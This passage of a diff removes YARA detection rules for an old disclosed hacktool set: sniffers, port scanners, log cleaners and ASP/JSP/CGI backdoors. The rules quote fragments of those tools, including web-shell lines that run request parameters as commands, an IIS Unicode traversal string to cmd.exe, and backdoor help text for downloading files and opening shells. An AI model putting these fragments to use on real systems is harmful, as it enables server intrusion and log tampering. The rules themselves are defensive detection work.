-		$s3 = "Bon >0 & <65535L" fullword ascii
-		$s4 = "--Choose " fullword ascii
-	condition:
-		all of them
-}
-
-rule PassSniffer {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file PassSniffer.exe"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "dcce4c577728e8edf7ed38ac6ef6a1e68afb2c9f"
-	strings:
-		$s2 = "Sniff" fullword ascii
-		$s3 = "GetLas" fullword ascii
-		$s4 = "VersionExA" fullword ascii
-		$s10 = " Only RuntUZ" fullword ascii
-		$s12 = "emcpysetprintf\\" fullword ascii
-		$s13 = "WSFtartup" fullword ascii
-	condition:
-		all of them
-}
-
-rule aspfile2 {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file aspfile2.asp"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "14efbc6cb01b809ad75a535d32b9da4df517ff29"
-	strings:
-		$s0 = "response.write \"command completed success!\" " fullword ascii
-		$s1 = "for each co in foditems " fullword ascii
-		$s3 = "<input type=text name=text6 value=\"<%= szCMD6 %>\"><br> " fullword ascii
-		$s19 = "<title>Hello! Welcome </title>" fullword ascii
-	condition:
-		all of them
-}
-
-rule Jc_ALL_WinEggDropShell_rar_Folder_SOCKS {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file SOCKS.exe"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "ad2168e9837592eeb120fc6798648b2fe996f79c"
-	strings:
-		$s0 = "http://go.163.com/~sdemo" fullword ascii
-		$s1 = "http://go.163.com/sdemo" fullword wide
-		$s4 = "Player.EXE" fullword wide
-		$s5 = "mailto:sdemo@263.net" fullword ascii
-		$s6 = "S-Player.exe" fullword ascii
-	condition:
-		all of them
-}
-
-rule UnPack_rar_Folder_InjectT {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file InjectT.exe"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "80f39e77d4a34ecc6621ae0f4d5be7563ab27ea6"
-	strings:
-		$s0 = "%s -Install                          -->To Install The Service" fullword ascii
-		$s1 = "Explorer.exe" fullword ascii
-		$s2 = "%s -Start                            -->To Start The Service" fullword ascii
-		$s3 = "%s -Stop                             -->To Stop The Service" fullword ascii
-		$s4 = "The Port Is Out Of Range" fullword ascii
-		$s7 = "Fail To Set The Port" fullword ascii
-		$s11 = "\\psapi.dll" fullword ascii
-		$s20 = "TInject.Dll" fullword ascii
-		
-		$x1 = "Software\\Microsoft\\Internet Explorer\\WinEggDropShell" fullword ascii
-		$x2 = "injectt.exe" fullword ascii		
-	condition:
-		( 1 of ($x*) ) and ( 3 of ($s*) )
-}
-
-rule Jc_WinEggDrop_Shell {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file Jc.WinEggDrop Shell.txt"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "820674b59f32f2cf72df50ba4411d7132d863ad2"
-	strings:
-		$s0 = "Sniffer.dll" fullword ascii
-		$s4 = ":Execute net.exe user Administrator pass" fullword ascii
-		$s5 = "Fport.exe or mport.exe " fullword ascii
-		$s6 = ":Password Sniffering Is Running |Not Running " fullword ascii
-		$s9 = ": The Terminal Service Port Has Been Set To NewPort" fullword ascii
-		$s15 = ": Del www.exe                   " fullword ascii
-		$s20 = ":Dir *.exe                    " fullword ascii
-	condition:
-		2 of them
-}
-
-rule aspbackdoor_asp1 {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file asp1.txt"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "9ef9f34392a673c64525fcd56449a9fb1d1f3c50"
-	strings:
-		$s0 = "param = \"driver={Microsoft Access Driver (*.mdb)}\" " fullword ascii
-		$s1 = "conn.Open param & \";dbq=\" & Server.MapPath(\"scjh.mdb\") " fullword ascii
-		$s6 = "set rs=conn.execute (sql)%> " fullword ascii
-		$s7 = "<%set Conn = Server.CreateObject(\"ADODB.Connection\") " fullword ascii
-		$s10 = "<%dim ktdh,scph,scts,jhqtsj,yhxdsj,yxj,rwbh " fullword ascii
-		$s15 = "sql=\"select * from scjh\" " fullword ascii
-	condition:
-		all of them
-}
-
-rule QQ_zip_Folder_QQ {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file QQ.exe"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "9f8e3f40f1ac8c1fa15a6621b49413d815f46cfb"
-	strings:
-		$s0 = "EMAIL:haoq@neusoft.com" fullword wide
-		$s1 = "EMAIL:haoq@neusoft.com" fullword wide
-		$s4 = "QQ2000b.exe" fullword wide
-		$s5 = "haoq@neusoft.com" fullword ascii
-		$s9 = "QQ2000b.exe" fullword ascii
-		$s10 = "\\qq2000b.exe" fullword ascii
-		$s12 = "WINDSHELL STUDIO[WINDSHELL " fullword wide
-		$s17 = "SOFTWARE\\HAOQIANG\\" fullword ascii
-	condition:
-		5 of them
-}
-
-rule UnPack_rar_Folder_TBack {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file TBack.DLL"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "30fc9b00c093cec54fcbd753f96d0ca9e1b2660f"
-	strings:
-		$s0 = "Redirect SPort RemoteHost RPort       -->Port Redirector" fullword ascii
-		$s1 = "http://IP/a.exe a.exe                 -->Download A File" fullword ascii
-		$s2 = "StopSniffer                           -->Stop Pass Sniffer" fullword ascii
-		$s3 = "TerminalPort Port                     -->Set New Terminal Port" fullword ascii
-		$s4 = "Example: Http://12.12.12.12/a.exe abc.exe" fullword ascii
-		$s6 = "Create Password Sniffering Thread Successfully. Status:Logging" fullword ascii
-		$s7 = "StartSniffer NIC                      -->Start Sniffer" fullword ascii
-		$s8 = "Shell                                 -->Get A Shell" fullword ascii
-		$s11 = "DeleteService ServiceName             -->Delete A Service" fullword ascii
-		$s12 = "Disconnect ThreadNumber|All           -->Disconnect Others" fullword ascii
-		$s13 = "Online                                -->List All Connected IP" fullword ascii
-		$s15 = "Getting The UserName(%c%s%c)-->ID(0x%s) Successfully" fullword ascii
-		$s16 = "Example: Set REG_SZ Test Trojan.exe" fullword ascii
-		$s18 = "Execute Program                       -->Execute A Program" fullword ascii
-		$s19 = "Reboot                                -->Reboot The System" fullword ascii
-		$s20 = "Password Sniffering Is Not Running" fullword ascii
-	condition:
-		4 of them
-}
-
-rule sig_238_cmd_2 {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file cmd.jsp"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "be4073188879dacc6665b6532b03db9f87cfc2bb"
-	strings:
-		$s0 = "Process child = Runtime.getRuntime().exec(" ascii
-		$s1 = "InputStream in = child.getInputStream();" fullword ascii
-		$s2 = "String cmd = request.getParameter(\"" ascii
-		$s3 = "while ((c = in.read()) != -1) {" fullword ascii
-		$s4 = "<%@ page import=\"java.io.*\" %>" fullword ascii
-	condition:
-		all of them
-}
-
-rule RangeScan {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file RangeScan.exe"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "bace2c65ea67ac4725cb24aa9aee7c2bec6465d7"
-	strings:
-		$s0 = "RangeScan.EXE" fullword wide
-		$s4 = "<br><p align=\"center\"><b>RangeScan " fullword ascii
-		$s9 = "Produced by isn0" fullword ascii
-		$s10 = "RangeScan" fullword wide
-		$s20 = "%d-%d-%d %d:%d:%d" fullword ascii
-	condition:
-		3 of them
-}
-
-rule XYZCmd_zip_Folder_Readme {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file Readme.txt"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "967cb87090acd000d22e337b8ce4d9bdb7c17f70"
-	strings:
-		$s3 = "3.xyzcmd \\\\RemoteIP /user:Administrator /pwd:1234 /nowait trojan.exe" fullword ascii
-		$s20 = "XYZCmd V1.0" fullword ascii
-	condition:
-		all of them
-}
-
-rule ByPassFireWall_zip_Folder_Inject {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file Inject.exe"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "34f564301da528ce2b3e5907fd4b1acb7cb70728"
-	strings:
-		$s6 = "Fail To Inject" fullword ascii
-		$s7 = "BtGRemote Pro; V1.5 B/{" fullword ascii
-		$s11 = " Successfully" fullword ascii
-	condition:
-		all of them
-}
-
-rule sig_238_sqlcmd {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file sqlcmd.exe"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 40
-		hash = "b6e356ce6ca5b3c932fa6028d206b1085a2e1a9a"
-	strings:
-		$s0 = "Permission denial to EXEC command.:(" fullword ascii
-		$s3 = "by Eyas<cooleyas@21cn.com>" fullword ascii
-		$s4 = "Connect to %s MSSQL server success.Enjoy the shell.^_^" fullword ascii
-		$s5 = "Usage: %s <host> <uid> <pwd>" fullword ascii
-		$s6 = "SqlCmd2.exe Inside Edition." fullword ascii
-		$s7 = "Http://www.patching.net  2000/12/14" fullword ascii
-		$s11 = "Example: %s 192.168.0.1 sa \"\"" fullword ascii
-	condition:
-		4 of them
-}
-
-rule ASPack_ASPACK {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file ASPACK.EXE"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "c589e6fd48cfca99d6335e720f516e163f6f3f42"
-	strings:
-		$s0 = "ASPACK.EXE" fullword wide
-		$s5 = "CLOSEDFOLDER" fullword wide
-		$s10 = "ASPack compressor" fullword wide
-	condition:
-		all of them
-}
-
-rule sig_238_2323 {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file 2323.exe"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "21812186a9e92ee7ddc6e91e4ec42991f0143763"
-	strings:
-		$s0 = "port - Port to listen on, defaults to 2323" fullword ascii
-		$s1 = "Usage: srvcmd.exe [/h] [port]" fullword ascii
-		$s3 = "Failed to execute shell" fullword ascii
-		$s5 = "/h   - Hide Window" fullword ascii
-		$s7 = "Accepted connection from client at %s" fullword ascii
-		$s9 = "Error %d: %s" fullword ascii
-	condition:
-		all of them
-}
-
-rule Jc_ALL_WinEggDropShell_rar_Folder_Install_2 {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file Install.exe"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "95866e917f699ee74d4735300568640ea1a05afd"
-	strings:
-		$s1 = "http://go.163.com/sdemo" fullword wide
-		$s2 = "Player.tmp" fullword ascii
-		$s3 = "Player.EXE" fullword wide
-		$s4 = "mailto:sdemo@263.net" fullword ascii
-		$s5 = "S-Player.exe" fullword ascii
-		$s9 = "http://www.BaiXue.net (" fullword wide
-	condition:
-		all of them
-}
-
-rule sig_238_TFTPD32 {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file TFTPD32.EXE"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "5c5f8c1a2fa8c26f015e37db7505f7c9e0431fe8"
-	strings:
-		$s0 = " http://arm.533.net" fullword ascii
-		$s1 = "Tftpd32.hlp" fullword ascii
-		$s2 = "Timeouts and Ports should be numerical and can not be 0" fullword ascii
-		$s3 = "TFTPD32 -- " fullword wide
-		$s4 = "%d -- %s" fullword ascii
-		$s5 = "TIMEOUT while waiting for Ack block %d. file <%s>" fullword ascii
-		$s12 = "TftpPort" fullword ascii
-		$s13 = "Ttftpd32BackGround" fullword ascii
-		$s17 = "SOFTWARE\\TFTPD32" fullword ascii
-	condition:
-		all of them
-}
-
-rule sig_238_iecv {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file iecv.exe"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "6e6e75350a33f799039e7a024722cde463328b6d"
-	strings:
-		$s1 = "Edit The Content Of Cookie " fullword wide
-		$s3 = "Accessories\\wordpad.exe" fullword ascii
-		$s4 = "gorillanation.com" fullword ascii
-		$s5 = "Before editing the content of a cookie, you should close all windows of Internet" ascii
-		$s12 = "http://nirsoft.cjb.net" fullword ascii
-	condition:
-		all of them
-}
-
-rule Antiy_Ports_1_21 {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file Antiy Ports 1.21.exe"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "ebf4bcc7b6b1c42df6048d198cbe7e11cb4ae3f0"
-	strings:
-		$s0 = "AntiyPorts.EXE" fullword wide
-		$s7 = "AntiyPorts MFC Application" fullword wide
-		$s20 = " @Stego:" fullword ascii
-	condition:
-		all of them
-}
-
-rule perlcmd_zip_Folder_cmd {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file cmd.cgi"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "21b5dc36e72be5aca5969e221abfbbdd54053dd8"
-	strings:
-		$s0 = "syswrite(STDOUT, \"Content-type: text/html\\r\\n\\r\\n\", 27);" fullword ascii
-		$s1 = "s/%20/ /ig;" fullword ascii
-		$s2 = "syswrite(STDOUT, \"\\r\\n</PRE></HTML>\\r\\n\", 17);" fullword ascii
-		$s4 = "open(STDERR, \">&STDOUT\") || die \"Can't redirect STDERR\";" fullword ascii
-		$s5 = "$_ = $ENV{QUERY_STRING};" fullword ascii
-		$s6 = "$execthis = $_;" fullword ascii
-		$s7 = "system($execthis);" fullword ascii
-		$s12 = "s/%2f/\\//ig;" fullword ascii
-	condition:
-		6 of them
-}
-
-rule aspbackdoor_asp3 {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file asp3.txt"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "e5588665ca6d52259f7d9d0f13de6640c4e6439c"
-	strings:
-		$s0 = "<form action=\"changepwd.asp\" method=\"post\"> " fullword ascii
-		$s1 = "  Set oUser = GetObject(\"WinNT://ComputerName/\" & UserName) " fullword ascii
-		$s2 = "    value=\"<%=Request.ServerVariables(\"LOGIN_USER\")%>\"> " fullword ascii
-		$s14 = " Windows NT " fullword ascii
-		$s16 = " WIndows 2000 " fullword ascii
-		$s18 = "OldPwd = Request.Form(\"OldPwd\") " fullword ascii
-		$s19 = "NewPwd2 = Request.Form(\"NewPwd2\") " fullword ascii
-		$s20 = "NewPwd1 = Request.Form(\"NewPwd1\") " fullword ascii
-	condition:
-		all of them
-}
-
-rule sig_238_FPipe {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file FPipe.exe"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "41d57d356098ff55fe0e1f0bcaa9317df5a2a45c"
-	strings:
-		$s0 = "made to port 80 of the remote machine at 192.168.1.101 with the" fullword ascii
-		$s1 = "Unable to resolve hostname \"%s\"" fullword ascii
-		$s2 = "source port for that outbound connection being set to 53 also." fullword ascii
-		$s3 = " -s    - outbound source port number" fullword ascii
-		$s5 = "http://www.foundstone.com" fullword ascii
-		$s20 = "Attempting to connect to %s port %d" fullword ascii
-	condition:
-		all of them
-}
-
-rule sig_238_concon {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file concon.com"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "816b69eae66ba2dfe08a37fff077e79d02b95cc1"
-	strings:
-		$s0 = "Usage: concon \\\\ip\\sharename\\con\\con" fullword ascii
-	condition:
-		all of them
-}
-
-rule aspbackdoor_regdll {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file regdll.asp"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "5c5e16a00bcb1437bfe519b707e0f5c5f63a488d"
-	strings:
-		$s1 = "exitcode = oShell.Run(\"c:\\WINNT\\system32\\regsvr32.exe /u/s \" & strFile, 0, " ascii
-		$s3 = "oShell.Run \"c:\\WINNT\\system32\\regsvr32.exe /u/s \" & strFile, 0, False" fullword ascii
-		$s4 = "EchoB(\"regsvr32.exe exitcode = \" & exitcode)" fullword ascii
-		$s5 = "Public Property Get oFS()" fullword ascii
-	condition:
-		all of them
-}
-
-rule CleanIISLog {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file CleanIISLog.exe"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "827cd898bfe8aa7e9aaefbe949d26298f9e24094"
-	strings:
-		$s1 = "CleanIP - Specify IP Address Which You Want Clear." fullword ascii
-		$s2 = "LogFile - Specify Log File Which You Want Process." fullword ascii
-		$s8 = "CleanIISLog Ver" fullword ascii
-		$s9 = "msftpsvc" fullword ascii
-		$s10 = "Fatal Error: MFC initialization failed" fullword ascii
-		$s11 = "Specified \"ALL\" Will Process All Log Files." fullword ascii
-		$s12 = "Specified \".\" Will Clean All IP Record." fullword ascii
-		$s16 = "Service %s Stopped." fullword ascii
-		$s20 = "Process Log File %s..." fullword ascii
-	condition:
-		5 of them
-}
-
-rule sqlcheck {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file sqlcheck.exe"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "5a5778ac200078b627db84fdc35bf5bcee232dc7"
-	strings:
-		$s0 = "Power by eyas<cooleyas@21cn.com>" fullword ascii
-		$s3 = "\\ipc$ \"\" /user:\"\"" fullword ascii
-		$s4 = "SQLCheck can only scan a class B network. Try again." fullword ascii
-		$s14 = "Example: SQLCheck 192.168.0.1 192.168.0.254" fullword ascii
-		$s20 = "Usage: SQLCheck <StartIP> <EndIP>" fullword ascii
-	condition:
-		3 of them
-}
-
-rule sig_238_RunAsEx {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file RunAsEx.exe"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "a22fa4e38d4bf82041d67b4ac5a6c655b2e98d35"
-	strings:
-		$s0 = "RunAsEx By Assassin 2000. All Rights Reserved. http://www.netXeyes.com" fullword ascii
-		$s8 = "cmd.bat" fullword ascii
-		$s9 = "Note: This Program Can'nt Run With Local Machine." fullword ascii
-		$s11 = "%s Execute Succussifully." fullword ascii
-		$s12 = "winsta0" fullword ascii
-		$s15 = "Usage: RunAsEx <UserName> <Password> <Execute File> [\"Execute Option\"]" fullword ascii
-	condition:
-		4 of them
-}
-
-rule sig_238_nbtdump {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file nbtdump.exe"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "cfe82aad5fc4d79cf3f551b9b12eaf9889ebafd8"
-	strings:
-		$s0 = "Creation of results file - \"%s\" failed." fullword ascii
-		$s1 = "c:\\>nbtdump remote-machine" fullword ascii
-		$s7 = "Cerberus NBTDUMP" fullword ascii
-		$s11 = "<CENTER><H1>Cerberus Internet Scanner</H1>" fullword ascii
-		$s18 = "<P><H3>Account Information</H3><PRE>" fullword wide
-		$s19 = "%s's password is %s</H3>" fullword wide
-		$s20 = "%s's password is blank</H3>" fullword wide
-	condition:
-		5 of them
-}
-
-rule sig_238_Glass2k {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file Glass2k.exe"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "b05455a1ecc6bc7fc8ddef312a670f2013704f1a"
-	strings:
-		$s0 = "Portions Copyright (c) 1997-1999 Lee Hasiuk" fullword ascii
-		$s1 = "C:\\Program Files\\Microsoft Visual Studio\\VB98" fullword ascii
-		$s3 = "WINNT\\System32\\stdole2.tlb" fullword ascii
-		$s4 = "Glass2k.exe" fullword wide
-		$s7 = "NeoLite Executable File Compressor" fullword ascii
-	condition:
-		all of them
-}
-
-rule SplitJoin_V1_3_3_rar_Folder_3 {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file splitjoin.exe"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "21409117b536664a913dcd159d6f4d8758f43435"
-	strings:
-		$s2 = "ie686@sohu.com" fullword ascii
-		$s3 = "splitjoin.exe" fullword ascii
-		$s7 = "SplitJoin" fullword ascii
-	condition:
-		all of them
-}
-
-rule aspbackdoor_EDIT {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file EDIT.ASP"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "12196cf62931cde7b6cb979c07bb5cc6a7535cbb"
-	strings:
-		$s1 = "<meta HTTP-EQUIV=\"Content-Type\" CONTENT=\"text/html;charset=gb_2312-80\">" fullword ascii
-		$s2 = "Set thisfile = fs.GetFile(whichfile)" fullword ascii
-		$s3 = "response.write \"<a href='index.asp'>" fullword ascii
-		$s5 = "if Request.Cookies(\"password\")=\"juchen\" then " fullword ascii
-		$s6 = "Set thisfile = fs.OpenTextFile(whichfile, 1, False)" fullword ascii
-		$s7 = "color: rgb(255,0,0); text-decoration: underline }" fullword ascii
-		$s13 = "if Request(\"creat\")<>\"yes\" then" fullword ascii
-	condition:
-		5 of them
-}
-
-rule aspbackdoor_entice {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file entice.asp"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "e273a1b9ef4a00ae4a5d435c3c9c99ee887cb183"
-	strings:
-		$s0 = "<Form Name=\"FormPst\" Method=\"Post\" Action=\"entice.asp\">" fullword ascii
-		$s2 = "if left(trim(request(\"sqllanguage\")),6)=\"select\" then" fullword ascii
-		$s4 = "conndb.Execute(sqllanguage)" fullword ascii
-		$s5 = "<!--#include file=sqlconn.asp-->" fullword ascii
-		$s6 = "rstsql=\"select * from \"&rstable(\"table_name\")" fullword ascii
-	condition:
-		all of them
-}
-
-rule FPipe2_0 {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file FPipe2.0.exe"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "891609db7a6787575641154e7aab7757e74d837b"
-	strings:
-		$s0 = "made to port 80 of the remote machine at 192.168.1.101 with the" fullword ascii
-		$s1 = "Unable to resolve hostname \"%s\"" fullword ascii
-		$s2 = " -s    - outbound connection source port number" fullword ascii
-		$s3 = "source port for that outbound connection being set to 53 also." fullword ascii
-		$s4 = "http://www.foundstone.com" fullword ascii
-		$s19 = "FPipe" fullword ascii
-	condition:
-		all of them
-}
-
-rule InstGina {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file InstGina.exe"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "5317fbc39508708534246ef4241e78da41a4f31c"
-	strings:
-		$s0 = "To Open Registry" fullword ascii
-		$s4 = "I love Candy very much!!" ascii
-		$s5 = "GinaDLL" fullword ascii
-	condition:
-		all of them
-}
-
-rule ArtTray_zip_Folder_ArtTray {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file ArtTray.exe"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "ee1edc8c4458c71573b5f555d32043cbc600a120"
-	strings:
-		$s0 = "http://www.brigsoft.com" fullword wide
-		$s2 = "ArtTrayHookDll.dll" fullword ascii
-		$s3 = "ArtTray Version 1.0 " fullword wide
-		$s16 = "TRM_HOOKCALLBACK" fullword ascii
-	condition:
-		all of them
-}
-
-rule sig_238_findoor {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file findoor.exe"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "cdb1ececceade0ecdd4479ecf55b0cc1cf11cdce"
-	strings:
-		$s0 = "(non-Win32 .EXE or error in .EXE image)." fullword ascii
-		$s8 = "PASS hacker@hacker.com" fullword ascii
-		$s9 = "/scripts/..%c1%1c../winnt/system32/cmd.exe" fullword ascii
-		$s10 = "MAIL FROM:hacker@hacker.com" fullword ascii
-		$s11 = "http://isno.yeah.net" fullword ascii
-	condition:
-		4 of them
-}
-
-rule aspbackdoor_ipclear {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file ipclear.vbs"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "9f8fdfde4b729516330eaeb9141fb2a7ff7d0098"
-	strings:
-		$s0 = "Set ServiceObj = GetObject(\"WinNT://\" & objNet.ComputerName & \"/w3svc\")" fullword ascii
-		$s1 = "wscript.Echo \"USAGE:KillLog.vbs LogFileName YourIP.\"" fullword ascii
-		$s2 = "Set txtStreamOut = fso.OpenTextFile(destfile, ForWriting, True)" fullword ascii
-		$s3 = "Set objNet = WScript.CreateObject( \"WScript.Network\" )" fullword ascii
-		$s4 = "Set fso = CreateObject(\"Scripting.FileSystemObject\")" fullword ascii
-	condition:
-		all of them
-}
-
-rule WinEggDropShellFinal_zip_Folder_InjectT {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file InjectT.exe"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "516e80e4a25660954de8c12313e2d7642bdb79dd"
-	strings:
-		$s0 = "Packed by exe32pack" ascii
-		$s1 = "2TInject.Dll" fullword ascii
-		$s2 = "Windows Services" fullword ascii
-		$s3 = "Findrst6" fullword ascii
-		$s4 = "Press Any Key To Continue......" fullword ascii
-	condition:
-		all of them
-}
-
-rule sig_238_rshsvc {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file rshsvc.bat"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "fb15c31254a21412aecff6a6c4c19304eb5e7d75"
-	strings:
-		$s0 = "if not exist %1\\rshsetup.exe goto ERROR2" fullword ascii
-		$s1 = "ECHO rshsetup.exe is not found in the %1 directory" fullword ascii
-		$s9 = "REM %1 directory must have rshsetup.exe,rshsvc.exe and rshsvc.dll" fullword ascii
-		$s10 = "copy %1\\rshsvc.exe" fullword ascii
-		$s12 = "ECHO Use \"net start rshsvc\" to start the service." fullword ascii
-		$s13 = "rshsetup %SystemRoot%\\system32\\rshsvc.exe %SystemRoot%\\system32\\rshsvc.dll" fullword ascii
-		$s18 = "pushd %SystemRoot%\\system32" fullword ascii
-	condition:
-		all of them
-}
-
-rule gina_zip_Folder_gina {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file gina.dll"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "e0429e1b59989cbab6646ba905ac312710f5ed30"
-	strings:
-		$s0 = "NEWGINA.dll" fullword ascii
-		$s1 = "LOADER ERROR" fullword ascii
-		$s3 = "WlxActivateUserShell" fullword ascii
-		$s6 = "WlxWkstaLockedSAS" fullword ascii
-		$s13 = "WlxIsLockOk" fullword ascii
-		$s14 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
-		$s16 = "WlxShutdown" fullword ascii
-		$s17 = "The ordinal %u could not be located in the dynamic link library %s" fullword ascii
-	condition:
-		all of them
-}
-
-rule superscan3_0 {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file superscan3.0.exe"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "a9a02a14ea4e78af30b8b4a7e1c6ed500a36bc4d"
-	strings:
-		$s0 = "\\scanner.ini" fullword ascii
-		$s1 = "\\scanner.exe" fullword ascii
-		$s2 = "\\scanner.lst" fullword ascii
-		$s4 = "\\hensss.lst" fullword ascii
-		$s5 = "STUB32.EXE" fullword wide
-		$s6 = "STUB.EXE" fullword wide
-		$s8 = "\\ws2check.exe" fullword ascii
-		$s9 = "\\trojans.lst" fullword ascii
-		$s10 = "1996 InstallShield Software Corporation" fullword wide
-	condition:
-		all of them
-}
-
-rule sig_238_xsniff {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file xsniff.exe"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "d61d7329ac74f66245a92c4505a327c85875c577"
-	strings:
-		$s2 = "xsiff.exe -pass -hide -log pass.log" fullword ascii
-		$s3 = "%s - simple sniffer for win2000" fullword ascii
-		$s4 = "xsiff.exe -tcp -udp -asc -addr 192.168.1.1" fullword ascii
-		$s5 = "HOST: %s USER: %s, PASS: %s" fullword ascii
-		$s7 = "http://www.xfocus.org" fullword ascii
-		$s9 = "  -pass        : Filter username/password" fullword ascii
-		$s18 = "  -udp         : Output udp packets" fullword ascii
-		$s19 = "Code by glacier <glacier@xfocus.org>" fullword ascii
-		$s20 = "  -tcp         : Output tcp packets" fullword ascii
-	condition:
-		6 of them
-}
-
-rule sig_238_fscan {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file fscan.exe"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "d5646e86b5257f9c83ea23eca3d86de336224e55"
-	strings:
-		$s0 = "FScan v1.12 - Command line port scanner." fullword ascii
-		$s2 = " -n    - no port scanning - only pinging (unless you use -q)" fullword ascii
-		$s5 = "Example: fscan -bp 80,100-200,443 10.0.0.1-10.0.1.200" fullword ascii
-		$s6 = " -z    - maximum simultaneous threads to use for scanning" fullword ascii
-		$s12 = "Failed to open the IP list file \"%s\"" fullword ascii
-		$s13 = "http://www.foundstone.com" fullword ascii
-		$s16 = " -p    - TCP port(s) to scan (a comma separated list of ports/ranges) " fullword ascii
-		$s18 = "Bind port number out of range. Using system default." fullword ascii
-		$s19 = "fscan.exe" fullword wide
-	condition:
-		4 of them
-}
-
-rule _iissample_nesscan_twwwscan {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - from files iissample.exe, nesscan.exe, twwwscan.exe"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		super_rule = 1
-		hash0 = "7f20962bbc6890bf48ee81de85d7d76a8464b862"
-		hash1 = "c0b1a2196e82eea4ca8b8c25c57ec88e4478c25b"
-		hash2 = "548f0d71ef6ffcc00c0b44367ec4b3bb0671d92f"
-	strings:
-		$s0 = "Connecting HTTP Port - Result: " fullword
-		$s1 = "No space for command line argument vector" fullword
